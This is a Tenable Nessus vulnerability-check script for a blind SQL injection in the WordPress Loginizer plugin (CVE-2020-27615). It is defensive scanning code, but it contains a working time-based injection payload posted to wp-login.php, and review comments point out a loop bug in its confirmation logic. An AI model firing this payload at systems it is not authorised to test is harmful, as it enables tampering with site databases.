
WordPress Loginizer plugin < 1.6.4 blind SQLi (CVE-2020-27615)

2020-10-22 00:00:00
This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com

The Loginizer Plugin for WordPress running on the remote web server is affected by a SQL injection vulnerability due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this issue to inject or manipulate SQL queries in the back-end database, resulting in the manipulation of arbitrary data.

#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

# Plugin registration: when the engine loads the script with `description`
# set, only the metadata below is emitted and the script exits before any
# network activity. The check itself starts after this block.
if (description)
{
  script_id(141810);
  script_version("1.4");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/12/05");

  script_cve_id("CVE-2020-27615");
  script_xref(name:"CEA-ID", value:"CEA-2020-0130");

  script_name(english:"WordPress Loginizer plugin < 1.6.4 blind SQLi (CVE-2020-27615)");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a PHP script that is affected by a remote SQL injection vulnerability.");
  script_set_attribute(attribute:"description", value:
"The Loginizer Plugin for WordPress running on the remote web server is affected by a SQL injection vulnerability
due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this issue to
inject or manipulate SQL queries in the back-end database, resulting in the manipulation of arbitrary data.");
  script_set_attribute(attribute:"see_also", value:"https://wpdeeply.com/loginizer-before-1-6-4-sqli-injection/");
  script_set_attribute(attribute:"see_also", value:"https://loginizer.com/blog/loginizer-1-6-4-security-fix/");
  script_set_attribute(attribute:"solution", value:
"Upgrade the Loginizer Plugin for WordPress to version 1.6.4 or later.");
  # CVSS v2 and v3 base/temporal vectors; the score source is the CVE itself.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-27615");

  # Active check: this script confirms the flaw by exercising it rather than
  # by version comparison (see ACT_ATTACK below).
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2020/10/21");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/10/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/10/22");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
  script_end_attributes();

  # ACT_ATTACK: the probe sends requests that change server-side timing
  # behaviour, so it runs in the attack phase, not the safe-checks phase.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Runs only after WordPress has been fingerprinted and PHP is known to be
  # present on a web port.
  script_dependencies("wordpress_detect.nasl");
  script_require_keys("installed_sw/WordPress", "www/PHP");
  script_require_ports("Services/www", 80);

  exit(0);
}

include('http.inc');
include('url_func.inc');
include('webapp_func.inc');

app = 'WordPress';

# Bail out early when the WordPress detector registered no installs.
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(app_name:app, port:port);

dir = install['path'];
install_url = build_url(port:port, qs:dir);

plugin     = 'Loginizer';
plugin_dir = '/wp-content/plugins/loginizer/';
plugin_url = build_url(port:port, qs:dir + plugin_dir);

# Reuse a plugin detection already recorded in the KB by an earlier script.
installed = get_kb_item('www/'+port+'/webapp_ext/'+plugin+' under '+dir);

if (!installed)
{
  # Fallback fingerprint: the plugin's readme.txt must carry its WordPress
  # plugin-repository header line.
  checks = make_array();
  checks[plugin_dir + 'readme.txt'][0] = make_list('=== Loginizer ===');

  installed = check_webapp_ext(
    checks : checks,
    dir    : dir,
    port   : port,
    ext    : plugin
  );
}
# No version check is attempted: the script only reports when the timing
# probe below confirms the flaw.
if (!installed) audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + ' plugin');

# then we attempt to exploit it
# Time-based blind SQLi confirmation. Each entry is the server-side delay
# (seconds) requested by one probe; two probes are sent so a single slow
# response is less likely to be mistaken for a positive.
stimes = make_list(15, 15);
num_queries = max_index(stimes);

vuln = FALSE;

url = '/wp-login.php';
# Plain failed login with a fixed, non-injected username. NOTE(review): this
# appears to seed the plugin's per-username state that the timed probes below
# then target with `WHERE username='nessus'` — confirm against the plugin's
# lockout table logic.
postdata = 'log=nessus&pwd=1229132295&wp-submit=Log+In&redirect_to=&testcookie=1';
http_send_recv3(
  method  : 'POST',
  port    : port,
  item    : dir + url,
  data    : postdata,
  content_type : 'application/x-www-form-urlencoded',
  exit_on_fail : TRUE
);

# NOTE(review): time_per_query and overalltime are first used with `+=`
# inside the loop without being initialised here; NASL treats the undefined
# value as '' / 0, so this works but reads as accidental.
for (i = 0; i < max_index(stimes); i++)
{
  # Allow the requested delay plus headroom before the HTTP read gives up;
  # a timeout with exit_on_fail:TRUE aborts the whole check.
  http_set_read_timeout(stimes[i] + 10);
  then = unixtime();

  # The injected username carries a SLEEP(n) that only executes when the
  # login field reaches the query unsanitised (the CVE-2020-27615 condition).
  postdata = 'log=nessus%27%2C+lockout%3Dlockout%2Bsleep%28' + stimes[i] + '%29+WHERE+username%3D%27nessus%27+LIMIT+1%3B%23&pwd=1229132295&wp-submit=Log+In&testcookie=1';

  res = http_send_recv3(
    method  : 'POST',
    port    : port,
    item    : dir + url,
    data    : postdata,
    content_type : 'application/x-www-form-urlencoded',
    exit_on_fail : TRUE
  );

  # Wall-clock round trip in whole seconds (unixtime() has 1 s resolution),
  # so network latency is folded into the measurement.
  now = unixtime();
  ttime = now - then;

  query = 'SLEEP(' +stimes[i]+ ');';

  time_per_query += 'Query #' + (i+1) + ' : ' + query + ' Sleep Time : ' +
  stimes[i] + ' secs  Response Time : ' + ttime + ' secs\n';

  overalltime += ttime;
  # Positive window: the response took at least the requested delay but no
  # more than 15 s beyond it, which filters out responses that were merely
  # slow or that hit the read timeout.
  if ( (ttime >= stimes[i]) && (ttime <= (stimes[i] + 15)) )
  {
    vuln = TRUE;

    output =
      'Blind SQL Injection Results' +
      '\n  Query                          : ' + query +
      '\n  Response time                  : ' + ttime + ' secs' +
      '\n  Number of queries executed     : ' + num_queries +
      '\n  Total test time                : ' + overalltime + ' secs' +
      '\n  Time per query                 : ' +
      '\n'+ '  ' + time_per_query;

    continue;
  }
  else
    # NOTE(review): no break here, and the positive branch does not
    # short-circuit either, so `vuln` ends up reflecting only the LAST probe.
    # With two 15 s probes, a miss followed by a hit still reports, and a hit
    # followed by a miss does not; if every probe is meant to confirm, this
    # branch should `break`.
    vuln = FALSE;
}

if (!vuln)
  audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, plugin_url, plugin + ' plugin');

# Report with the last request sent (the final timed probe) as evidence,
# together with the per-query timing summary built in the loop.
security_report_v4(
  port       : port,
  severity   : SECURITY_HOLE,
  generic    : TRUE,
  sqli       : TRUE,
  request    : make_list(http_last_sent_request()),
  output     : output
);